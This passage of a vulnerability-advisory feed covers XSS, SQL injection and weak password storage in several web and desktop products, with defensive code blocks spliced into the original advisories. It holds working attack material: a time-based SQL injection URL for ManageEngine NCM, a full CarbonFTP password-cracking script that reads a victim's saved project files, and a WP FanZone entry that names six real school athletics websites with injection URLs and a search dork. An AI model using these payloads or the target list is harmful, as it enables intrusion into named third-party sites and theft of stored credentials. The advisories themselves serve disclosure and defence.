Revive Adserver versions 5.0.3 and below suffer from a cross site scripting vulnerability.

MD5 | 876b5c6e7b14f9d76a23e57cfee6a8f9

========================================================================
Revive Adserver Security Advisory REVIVE-SA-2020-001
------------------------------------------------------------------------
https://www.revive-adserver.com/security/revive-sa-2020-001
------------------------------------------------------------------------
CVE-IDs: t.b.a.
Date: 2020-01-21
Risk Level: Low
Applications affected: Revive Adserver
Versions affected: <= 5.0.3
Versions not affected: >= 5.0.4
Website: https://www.revive-adserver.com/
========================================================================


========================================================================
Vulnerability - Reflected XSS
========================================================================
Vulnerability Type: Improper Neutralization of Input During Web Page
Generation ('Cross-site Scripting') [CWE-79]
CVE-ID: t.b.a.
CVSS Base Score: 4.3
CVSSv3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
CVSS Impact Subscore: 1.4
CVSS Exploitability Subscore: 2.8
========================================================================

Description
-----------
A reflected XSS vulnerability in the publicly accessible afr.php delivery
script of Revive Adserver was discovered by Jacopo Tediosi.
There are currently no known exploits: the session identifier cannot
be accessed because, as of v3.2.2, it is stored in an HttpOnly cookie. On
older versions, however, under specific circumstances, it could be
possible to steal the session identifier and gain access to the admin
interface.

Details
-------
The query string sent to the www/delivery/afr.php script was printed
back without proper escaping in a JavaScript context, allowing an
attacker to execute arbitrary JavaScript in the victim's browser.
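The fix for this class of bug is to encode the reflected value for the JavaScript string context rather than pasting it in raw. The following is an added example (not Revive Adserver's own code, and not the upstream patch): a small encoder built on `json.dumps`, the unsafe reflection pattern the advisory describes beside the hardened version, and a structural check that the reflected data could not close or open a `<script>` element. The function names and the sample query string are mine.

```python
import json

# HTML-significant characters that json.dumps leaves untouched. Escaping them as
# \uXXXX keeps "</script>" and "<!--" from ever appearing inside the literal.
_HTML_SENSITIVE = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026"}


def js_string_literal(value: str) -> str:
    """Encode `value` as a JavaScript string literal that is safe inside <script>.

    json.dumps handles quotes, backslashes and control characters, and with
    ensure_ascii=True also U+2028/U+2029 (JS line terminators). The remaining
    HTML-sensitive characters are replaced afterwards; the result is still valid
    JSON, so JSON.parse / json.loads recover the original text exactly."""
    encoded = json.dumps(value, ensure_ascii=True)
    return "".join(_HTML_SENSITIVE.get(ch, ch) for ch in encoded)


def render_unsafe(query_string: str) -> str:
    """The pattern the advisory describes: raw request data pasted into JS."""
    return '<script>var qs = "%s";</script>' % query_string


def render_safe(query_string: str) -> str:
    """Same page, with the value emitted through js_string_literal()."""
    return "<script>var qs = %s;</script>" % js_string_literal(query_string)


def script_block_intact(html: str) -> bool:
    """Cheap structural check: exactly one <script> open and one close tag, so
    reflected data neither closed the element early nor opened a new one."""
    lower = html.lower()
    return lower.count("<script") == 1 and lower.count("</script") == 1


def round_trips(value: str) -> bool:
    """The escaped literal must decode back to the original value."""
    return json.loads(js_string_literal(value)) == value


# Constructed sample: a query string that tries to break out of the JS string
# and out of the <script> element.
SAMPLE_QUERY = 'zoneid=1";</script><script>alert(1)</script>'

if __name__ == "__main__":
    print("unsafe intact:", script_block_intact(render_unsafe(SAMPLE_QUERY)))
    print("safe intact:  ", script_block_intact(render_safe(SAMPLE_QUERY)))
    print(render_safe(SAMPLE_QUERY))
```

Encoding to `\uXXXX` rather than HTML-entity encoding matters here: inside a `<script>` element the browser does not decode entities, so `&lt;` would reach the script verbatim, whereas a JS unicode escape is decoded by the JS engine only after the HTML parser has already decided where the script element ends.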


References
----------
https://hackerone.com/reports/775693
https://github.com/revive-adserver/revive-adserver/commit/327aaf10
https://github.com/revive-adserver/revive-adserver/commit/9ec2fa26
https://cwe.mitre.org/data/definitions/79.html



========================================================================
Solution
========================================================================

We strongly advise people to upgrade to the most recent 5.0.4 version of
Revive Adserver.


========================================================================
Contact Information
========================================================================

The security contact for Revive Adserver can be reached at:
.

Please review https://www.revive-adserver.com/security/ before doing so.


--
Matteo Beccati
On behalf of the Revive Adserver Team
https://www.revive-adserver.com/



Park Ticketing Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

MD5 | 1e843f25a9ae3b474d06c5f3b5494406

# Exploit Title: Park Ticketing Management System 1.0 Stored Cross-Site Scripting Vulnerability
# Date: 2020-01-21
# Exploit Author: Priyanka Samak
# Vendor Homepage: https://phpgurukul.com/

# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/

# Software: Park Ticketing Management System
# Version : 1.0
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10
# This application is vulnerable to Stored XSS vulnerability. This
# Vulnerable script: http://localhost/ptms/normal-search.php
# Vulnerable parameter: ‘search ticket’ Input Field

# Payload used: alert(123)
# POC: http://localhost/ptms/normal-search.php. Enter the specially
# crafted ticket number in the search field of this page.
# Click Search and you will see your JavaScript code execute.


Thanks and Regards,

Priyanka Samak


ManageEngine Network Configuration Manager version 12.2 suffers from a remote SQL injection vulnerability in apiKey.

MD5 | e40aede705e7f315c1ee28bc594b9670

# Exploit Title: ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection
# Discovery Date: 2019-01-24
# Published: 2020-01-20
# Exploit Author: AmirHadi Yazdani
# Vendor Homepage: https://www.manageengine.com/network-configuration-manager/
# Software Link: https://www.manageengine.com/network-configuration-manager/
# Demo: http://demo.networkconfigurationmanager.com
# Version: <= Build Version : 12.2
# Tested on: win 2012 R2
------------
About ManageEngine Network Configuration Manager (NCM) (from the vendor site):

Network Configuration Manager is a multi-vendor network change,
configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices.
NCM helps automate and take total control of the entire life cycle of device configuration management.
--------------------------------------------------------

Exploit POC :

# Parameter: apiKey (GET)
# Title: PostgreSQL Time Based Blind
# Vector: AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))

#Payload:
http://127.0.0.1/api/json/dashboard/getOverviewList?apiKey=1 AND 1398=(SELECT COUNT(*) FROM GENERATE_SERIES(1,3000000))&TimeFrame=hourly&_=1483732552930
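A time-based blind injection like the one above leaves two traces in a web server's access log: a query-string value that contains a delay primitive, and a response that took about as long as the requested sleep. The following detection script is an added example (not part of the advisory and not a ManageEngine tool) that runs over constructed Apache-style log lines carrying a trailing `%D` (microseconds) field. The expected shape of a legitimate `apiKey` is an assumption that must be adjusted to the real token format; the log lines, function names and thresholds are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style log lines with a trailing %D (request duration in
# microseconds): one normal call, one carrying the advisory's time-based payload
# (percent-encoded, as a server would actually log it), and one normal call
# that simply happened to be slow.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jan/2020:10:01:02 +0000] "GET /api/json/dashboard/getOverviewList?apiKey=8f3a2c4d9e&TimeFrame=hourly HTTP/1.1" 200 512 150000
10.0.0.9 - - [20/Jan/2020:10:01:07 +0000] "GET /api/json/dashboard/getOverviewList?apiKey=1%20AND%201398%3D(SELECT%20COUNT(*)%20FROM%20GENERATE_SERIES(1,3000000))&TimeFrame=hourly HTTP/1.1" 200 512 3200000
10.0.0.5 - - [20/Jan/2020:10:01:15 +0000] "GET /api/json/dashboard/getOverviewList?apiKey=8f3a2c4d9e&TimeFrame=daily HTTP/1.1" 200 81920 2500000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<usec>\d+)$'
)

# Delay primitives used for time-based blind SQL injection on common engines
# (GENERATE_SERIES is the PostgreSQL one from the advisory).
TIME_BASED_SQL = re.compile(
    r"GENERATE_SERIES\s*\(|PG_SLEEP\s*\(|\bSLEEP\s*\(|WAITFOR\s+DELAY|BENCHMARK\s*\(",
    re.I,
)

# Assumption: a legitimate NCM apiKey is a short alphanumeric token. Replace
# with the real format before using this in production.
API_KEY_SHAPE = re.compile(r"^[A-Za-z0-9]{6,64}$")
SLOW_USEC = 2000000  # 2 s; the advisory's payload sleeps for about 3 s


def inspect_line(line: str):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    api_key = params.get("apiKey", [""])[0]      # parse_qs percent-decodes
    reasons, severity = [], None
    if TIME_BASED_SQL.search(api_key):
        reasons.append("time-based SQL primitive in apiKey")
        severity = "high"
    elif not API_KEY_SHAPE.match(api_key):
        reasons.append("apiKey does not match the expected token shape")
        severity = "medium"
    if int(m["usec"]) >= SLOW_USEC:
        reasons.append("response slower than %d ms" % (SLOW_USEC // 1000))
        severity = severity or "low"   # timing alone is only a weak signal
    if not reasons:
        return None
    return {"ip": m["ip"], "apiKey": api_key, "severity": severity, "reasons": reasons}


def scan(log_text: str):
    """Inspect every line and keep only the findings."""
    return [f for f in (inspect_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The slow-but-benign line is deliberately included: a duration threshold on its own produces noise, so it only raises severity when combined with a malformed or SQL-bearing key. In practice the medium-severity branch (a key that is not shaped like a key) catches obfuscated variants that the keyword list misses.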

--------------------------


Microsoft Windows Media Center is affected by an issue that allows attackers to bypass the current security standards. The issue can be exploited through a specially crafted wma or wmv file containing a script instruction called URL.

MD5 | 76272c9530cfa1cab72a045a339c94c6


Neowise CarbonFTP version 1.4 suffers from an insecure proprietary password encryption implementation.

MD5 | 2f6419d375c7cce9a08d9d668268aeed

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.neowise.com


[Product]
CarbonFTP v1.4

CarbonFTP is a file synchronization tool that lets you sync local files with a remote FTP server and vice versa.
It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and an option
to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be
quickly re-used later.

Download: https://www.neowise.com/freeware/
Hash: 7afb242f13a9c119a17fe66c6f00a1c8


[Vulnerability Type]
Insecure Proprietary Password Encryption


[CVE Reference]
CVE-2020-6857


[Affected Component]
Password Encryption


[Impact Escalation of Privileges]
true


[Impact Information Disclosure]
true


[Security Issue]
CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key.
The key for locally stored FTP server passwords is hard-coded in the binary. Passwords encoded as hex
are converted to decimal, and the key "97F" is then added to the result. The key 97F seems
to be the same for all executables across all systems. Finally, passwords are stored as decimal values.

If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files.
They can be found under "C:\Users\<username>\AppData\Roaming\Neowise\CarbonFTPProjects".

e.g.

Password=STRING|"2086721956209392195620939"

Observing some very short password examples we see interesting patterns:

27264 27360 27360 27360 27360 = a
27520 27617 27617 27617 27617 = b
27266 27616 27360 27361 27616 = aab
27521 27616 27616 27616 27616 = ba

Password encryption/decryption is as follows.

Encryption process example.
484C as decimal is the value 18508
97F hex to decimal is the value 2431 (encrypt key)
18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL".

To decrypt we just perform the reverse of the operation above.
20939 - 2431 = 18508
Next, convert the decimal value 18508 to hex and we get 484C.
Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL".

CarbonFTP passwords less than nine characters are padded using chars from the current password up until
reaching a password length of nine bytes.

The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length
of nine bytes "XYXYXYXYX".

Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes.

Therefore, we will get several cracked password candidates like: "HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH"
However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one
shot without having several candidates to choose from with one of them being the correct password.

Therefore, "LOOOOONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947"
and because it is greater than nine bytes it is cracked without any candidate passwords returned.
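To check the advisory's numbers, the following model of the stored-password encoding is added here; it is not the advisory author's code and not anything from Neowise. The layout it implements (one byte holding the real password length, then the password padded by repetition to at least nine characters, read as little-endian 16-bit words with 0x97F added to each and written as 5-digit decimals) is my reading of the sample values quoted above, which the advisory describes in terms of hex pairs; it reproduces every stored value on this page exactly. The NUL pad for odd byte counts is an assumption no sample covers, and the function names are mine. It goes one step beyond the text by showing that a single known password is enough to recover the key, which is why a fixed additive constant provides no confidentiality.

```python
KEY = 0x97F        # 2431: the hard-coded additive key named in the advisory
MIN_LEN = 9        # shorter passwords are padded by repeating them (advisory)
WORD_DIGITS = 5    # each 16-bit word is written as a 5-digit decimal number


def _pad(password: str) -> str:
    """Repeat the password until it is at least MIN_LEN characters long."""
    if len(password) >= MIN_LEN:
        return password
    return (password * MIN_LEN)[:MIN_LEN]


def encode_password(password: str) -> str:
    """Produce the decimal string CarbonFTP writes to a .CFTP file.

    Layout inferred from the advisory's samples: one length byte, then the
    padded password, taken as little-endian 16-bit words; KEY is added to
    each word and the result is printed as five decimal digits."""
    if not password or len(password) > 255:
        raise ValueError("password must be 1..255 characters")
    data = bytes([len(password)]) + _pad(password).encode("latin-1")
    if len(data) % 2:
        data += b"\x00"  # assumption: odd byte counts get a NUL pad (no sample on the page)
    words = (int.from_bytes(data[i:i + 2], "little") for i in range(0, len(data), 2))
    return "".join("%05d" % (w + KEY) for w in words)


def decode_password(stored: str) -> str:
    """Inverse of encode_password; raises ValueError on malformed input."""
    if not stored or len(stored) % WORD_DIGITS or not stored.isdigit():
        raise ValueError("stored value must be a multiple of 5 decimal digits")
    words = [int(stored[i:i + WORD_DIGITS]) - KEY
             for i in range(0, len(stored), WORD_DIGITS)]
    if any(w < 0 or w > 0xFFFF for w in words):
        raise ValueError("word out of range: not a CarbonFTP value")
    data = b"".join(w.to_bytes(2, "little") for w in words)
    length = data[0]
    if length == 0 or length > len(data) - 1:
        raise ValueError("length byte inconsistent with stored data")
    return data[1:1 + length].decode("latin-1")


def recover_key(password: str, stored: str) -> int:
    """Why an additive constant is not encryption: one known password and its
    stored form give the key by a single subtraction on the first word."""
    first_word = int.from_bytes(
        bytes([len(password)]) + password[:1].encode("latin-1"), "little")
    return int(stored[:WORD_DIGITS]) - first_word


if __name__ == "__main__":
    for sample in ("a", "XY", "HELL", "LOOOOONGPASSWORD!"):
        enc = encode_password(sample)
        print("%-18s -> %s -> %s" % (sample, enc, decode_password(enc)))
    print("recovered key: 0x%X" % recover_key("HELL", "2086721956209392195620939"))
```

The advisory's "HL" illustration (484C + 97F = 20939) corresponds to the word 0x484C, which in little-endian order is the byte pair "L","H" taken from the padded text "HELLHELLH"; the model reproduces the advisory's stored strings for "a", "XY", "HELL" and "LOOOOONGPASSWORD!" byte for byte. Because the length byte is stored, the candidate list the advisory describes for short passwords is not actually needed to recover the original.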

From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process,
using the same password "HELL" as an example.

BPX @47DA6F

0047DA6F | 8D 45 F0 | lea eax,dword ptr ss:[ebp-10] |
0047DA72 | 50 | push eax |
0047DA73 | B9 05 00 00 00 | mov ecx,5 |
0047DA78 | 8B D3 | mov edx,ebx |
0047DA7A | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939"
0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678 |
0047DA82 | 83 C3 05 | add ebx,5 |
0047DA85 | 8B 45 F0 | mov eax,dword ptr ss:[ebp-10] | [ebp-10]:"20867"
0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C |
0047DA8D | 2B 45 F8 | sub eax,dword ptr ss:[ebp-8] | ;<======= BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
0047DA90 | 66 89 06 | mov word ptr ds:[esi],ax |
0047DA93 | 83 C6 02 | add esi,2 |
0047DA96 | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939"
0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418 |
0047DA9E | 3B D8 | cmp ebx,eax |
0047DAA0 | 7E CD | jle carbonftp.47DA6F |


A simple explanation after setting a breakpoint (BPX) at 47DA88:

At offset 0047DA8D the local variable [ebp-8], which holds the decimal value 2431 (hex 97F), is subtracted from EAX;
we also see that EAX holds the value 55C4:
sub eax,dword ptr ss:[ebp-8]
therefore 55C4 - 97F = 4C45 <======= ENCRYPT/DECRYPT KEY PROCESS.
mov word ptr ds:[esi],ax
add esi, 2 which is 4C45 + 2 = 4C47 <===== THEN

Given a two letter combination like "HL":
484C as decimal is 18508
97F hex to decimal is 2431
18508 + 2431 = 20939 = "HL"

Done!


[Exploit/POC]
"CarbonFTPExploit.py"

import time, string, sys, argparse, os, binascii
from pkgutil import iter_modules

#Sample test password
#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947

key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program.
chunk_sz=5 #number of bytes we must decrypt the password by.

#Password is stored here:
#C:\Users\<username>\AppData\Roaming\Neowise\CarbonFTPProjects\<project>.CFTP

#Neowise CarbonFTP v1.4
#Insecure Proprietary Password Encryption
#By John Page (aka hyp3rlinx)
#Apparition Security
#===================================================

def haslib(lib):
    if not lib in (name for loader, name, ispkg in iter_modules()):
        print("[!] "+lib+ " does not exist, pip install "+lib)
        exit()
    return True


def carbonftp_conf(conf_file):
    p=""
    pipe=-1
    passwd=""
    lst_of_passwds=[]
    try:
        for p in conf_file:
            idx = p.find("Password=STRING|")
            if idx != -1:
                pipe = p.find("|")
                if pipe != -1:
                    passwd = p[pipe + 2: -2]
                    print(" Password found: "+ passwd)
                    lst_of_passwds.append(passwd)
    except Exception as e:
        print(str(e))
    return lst_of_passwds


def reorder(lst):
    k=1
    j=0
    for n in range(len(lst)):
        k+=1
        j+=1
        try:
            tmp = lst[n+k]
            a = lst[n+j]
            lst[n+j] = tmp
            lst[n+k] = a
        except Exception as e:
            pass
    return ''.join(lst)


def dec2hex(dec):
    tmp = str(hex(int(dec)))
    return str(tmp[2:])


def hex2ascii(h):
    h=h.strip()
    try:
        #binascii works on both Python 2 and 3 (str.decode("hex") is Python 2 only).
        hex_val = binascii.unhexlify(h).decode("latin-1")
    except Exception as e:
        print("[!] Not a valid hex string.")
        exit()
    filtered_str = ''.join(s for s in hex_val if s in string.printable)
    return filtered_str


def chunk_passwd(passwd_lst):
    lst = []
    for passwd in passwd_lst:
        while passwd:
            lst.append(passwd[:chunk_sz])
            passwd = passwd[chunk_sz:]
    return lst


cnt = 0
passwd_str=""
def deob(c):

    global cnt, passwd_str

    tmp=""

    try:
        tmp = int(c) - int(key, 16)
        tmp = dec2hex(tmp)
    except Exception as e:
        print("[!] Not a valid CarbonFTP encrypted password.")
        exit()

    b=""
    a=""

    #Seems we can delete the second char as its most always junk.
    if cnt!=1:
        a = tmp[:2]
        cnt+=1
    else:
        b = tmp[:4]

    passwd_str += hex2ascii(a + b)

    hex_passwd_lst = list(passwd_str)
    return hex_passwd_lst


def no_unique_chars(lst):
    c=0
    k=1
    j=0
    for i in range(len(lst)):
        k+=1
        j+=1
        try:
            a = lst[i]
            b = lst[i+1]
            if a != b:
                c+=1
            elif c==0:
                print("[!] Possible one char password?: " +str(lst[0]))
                return lst[0]
        except Exception as e:
            pass
    return False


def decryptor(result_lst):

    global passwd_str, sz

    final_carbon_passwd=""

    print(" Decrypting ... \n")
    for i in result_lst:
        print("[-] "+i)
        time.sleep(0.1)
        lst = deob(i)

    #Re-order chars to correct sequence using custom swap function (reorder).
    reordered_pass = reorder(lst)
    sz = len(reordered_pass)

    #Flag possible single char password.
    no_unique_chars(lst)

    print("[+] PASSWORD LENGTH: " + str(sz))
    if sz == 9:
        return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-4] + " | " +
                reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)

    #Shorter passwords less then nine chars will have several candidates
    #as they get padded with repeating chars so we return those.

    passwd_str=""
    return reordered_pass


def display_cracked_passwd(sz, passwd):
    if sz==9:
        print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
    else:
        print("[*] DECRYPTED PASSWORD: "+passwd + "\n")


def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
    parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
    return parser.parse_args()


def main(args):

    global passwd_str, sz
    victim=""

    haslib("clint")

    if args.user and args.encrypted_password:
        print("[!] Supply a victims username -u or single encrypted password -p, not both.")
        exit()

    print("[+] Neowise CarbonFTP v1.4")
    time.sleep(0.1)
    print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
    time.sleep(0.1)
    print("[+] Discovered and cracked by hyp3rlinx")
    time.sleep(0.1)
    print("[+] ApparitionSec\n")
    time.sleep(1)

    #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
    if args.user:
        victim = args.user
        os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
        dir_lst = os.listdir(".")
        for c in dir_lst:
            f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
            #Get encrypted password from conf file
            passwd_enc = carbonftp_conf(f)
            #Break up into 5 byte chunks as processed by the proprietary decryption routine.
            result_lst = chunk_passwd(passwd_enc)
            #Decrypt the 5 byte chunks and reassemble to the cleartext password.
            cracked_passwd = decryptor(result_lst)
            #Print cracked password or candidates.
            display_cracked_passwd(sz, cracked_passwd)
            time.sleep(0.3)
            passwd_str=""
            f.close()


    #Crack a single password -p flag.
    if args.encrypted_password:
        passwd_to_crack_lst = []
        passwd_to_crack_lst.append(args.encrypted_password)
        result = chunk_passwd(passwd_to_crack_lst)
        #Print cracked password or candidates.
        cracked_passwd = decryptor(result)
        display_cracked_passwd(sz, cracked_passwd)


if __name__=="__main__":

    parser = argparse.ArgumentParser()

    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        exit()

    main(parse_args())



[POC Video URL]
https://www.youtube.com/watch?v=q9LMvAl6LfE


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification (website contact form not working, several attempts): January 12, 2020
CVE Assigned by MITRE: January 13, 2020
Public Disclosure: January 20, 2020



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


WordPress WP Fanzone theme version 3.1 suffers from a remote SQL injection vulnerability.

MD5 | b7837f56e2fe77a07ca4896ec9f73ed6

###################################################################

# Exploit Title : Built with WordPress and WP FanZone Themes 3.1 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/01/2020
# Vendor Homepage : wordpress.org - wpdevshed.com/wp-fanzone-theme/
# Software Download Link : downloads.wordpress.org/theme/wp-fanzone.3.1.zip
# Software Version : 3.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dork : Built with WordPress and WP FanZone site:ca
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Description About Software :
****************************
WP Fan Zone was designed originally with sports fans and bloggers in mind,
but it could easily be used for any type of blog or magazine style site that wants to
feature images and content. It is fully responsive, comes with two main menus, and
widget areas for all page types. It also has customization options for social media
links, color scheme and author bios, plus a simple banner widget for putting ads in the header.

###################################################################

# Impact :
***********
Built with WordPress and WP FanZone 3.1 is prone to an SQL injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or any SQL injection tool.

###################################################################

# Administrator Login Path :
***************************
/admin/adminLogin.php
/admin/convenorLogin.php
/admin/coachLogin.php
/index.php/department-heads/
/wp-login.php

# SQL Injection Exploit :
**********************
/weeklySchedule.php?schoolid=[ID-NUMBER]&date=ALL&leagueid=[ID-NUMBER]&divisionid=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
LOSSA – Lake Ontario Secondary School Athletics

[+] lossa.on.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

LKSSAA – Lambton Kent Secondary School Athletic Association

[+] lkssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

Sudbury District Secondary Schools' Athletic Association

[+] sdssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

BCSSAA – Brant County Secondary Schools' Athletic Association

[+] bcssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

Huron Perth Athletic Association

[+] hpathletics.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

NRHSAA – Niagara Region High School Athletic Association

[+] nrhsaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

###################################################################

# Example SQL Database Error :
****************************
Failed Query: SELECT gameid, hometeamid, homessid, awayteamid, awayssid, dateandtime,
specialnotes, DATE_FORMAT(dateandtime, '%h:%i %p') AS gametime, DATE_FORMAT
(dateandtime, '%W, %M %e, %Y') as formattedDate, substring(dateandtime, 1, 10) AS gdate,
scoreupdated, hometeamscore, hometeamstats, awayteamscore, awayteamstats,
schedule_results.leagueid AS leagueid, sportName, levelName, genderName, leagueName,
locationName, locations.locationid AS locationid FROM schedule_results, sports, leagues,
locations, levels, genders WHERE sports.sportid = leagues.sportid AND schedule_results.
locationid = locations.locationid AND levels.levelID = leagues.levelID AND genders.genderID =
leagues.genderID AND scheduleLive = 1 AND YEARWEEK(dateandtime) = '202003' AND
schedule_results.leagueid = leagues.leagueid AND (hometeamid = 17 OR awayteamid = 17)
AND schedule_results.leagueid = '16' AND (hometeamid IN (SELECT schoolid FROM
standings WHERE leagueid = 16 AND divisionid = 1') OR awayteamid IN (SELECT schoolid
FROM standings WHERE leagueid = 16 AND divisionid = 1')) ORDER BY dateandtime,
leagueid
SQL Error: You have an error in your SQL syntax; check the manual that corresponds
to your MariaDB server version for the right syntax to use near '') OR awayteamid IN
(SELECT schoolid FROM standings WHERE leagueid = 16 AND div' at line 1
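The leaked query shows the `divisionid` request parameter spliced directly into the SQL text, which is why a stray quote produces a syntax error instead of an empty result. The following is an added example (not the theme's code and not a vendor patch) that rebuilds the `standings` sub-select against an in-memory SQLite table with constructed rows, keeps the failing concatenation pattern beside a validated, parameterized version, and shows how each one treats the inputs from this advisory. Column names come from the error message above; the rows, function names and the `raises` helper are mine.

```python
import sqlite3


def open_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the standings table named in the failing query
    (constructed rows; column names taken from the leaked query)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE standings (schoolid INTEGER, leagueid INTEGER, divisionid INTEGER);
        INSERT INTO standings VALUES (17, 16, 1);
        INSERT INTO standings VALUES (22, 16, 1);
        INSERT INTO standings VALUES (31, 16, 2);
    """)
    return con


def schools_in_division_unsafe(con, leagueid: str, divisionid: str):
    """Request parameters concatenated into the SQL text, the pattern the
    leaked query reveals. A quote breaks the syntax; a boolean clause
    widens the result set."""
    sql = ("SELECT schoolid FROM standings WHERE leagueid = %s AND divisionid = %s "
           "ORDER BY schoolid" % (leagueid, divisionid))
    return [row[0] for row in con.execute(sql)]


def schools_in_division_safe(con, leagueid: str, divisionid: str):
    """Validate the identifiers as integers, then bind them as parameters so
    the database never interprets request data as SQL."""
    lid, did = int(leagueid), int(divisionid)   # "1'" and "1 OR 1=1" raise ValueError here
    sql = ("SELECT schoolid FROM standings WHERE leagueid = ? AND divisionid = ? "
           "ORDER BY schoolid")
    return [row[0] for row in con.execute(sql, (lid, did))]


def raises(fn, exc) -> bool:
    """True if calling fn() raises exc (small helper for the checks below)."""
    try:
        fn()
    except exc:
        return True
    return False


if __name__ == "__main__":
    con = open_demo_db()
    print("unsafe, normal input :", schools_in_division_unsafe(con, "16", "1"))
    print("unsafe, quote        :", raises(lambda: schools_in_division_unsafe(con, "16", "1'"),
                                           sqlite3.OperationalError))
    print("unsafe, 1 OR 1=1     :", schools_in_division_unsafe(con, "16", "1 OR 1=1"))
    print("safe, normal input   :", schools_in_division_safe(con, "16", "1"))
    print("safe, quote rejected :", raises(lambda: schools_in_division_safe(con, "16", "1'"), ValueError))
```

Two layers are at work in the safe version: the `int()` cast rejects anything that is not an identifier before the database is involved, and the `?` placeholders guarantee that even a value which passed validation is sent as data, not as SQL. In the WordPress/PHP setting the equivalent is `absint()` on the parameter followed by `$wpdb->prepare()` with `%d`.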

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################


This Metasploit module exploits an authenticated remote code execution vulnerability in Centreon version 19.04.

MD5 | 08423215f6164a41be95f6c0ff55b39b

####################################################################
# This module requires Metasploit: https://metasploit.com/download #
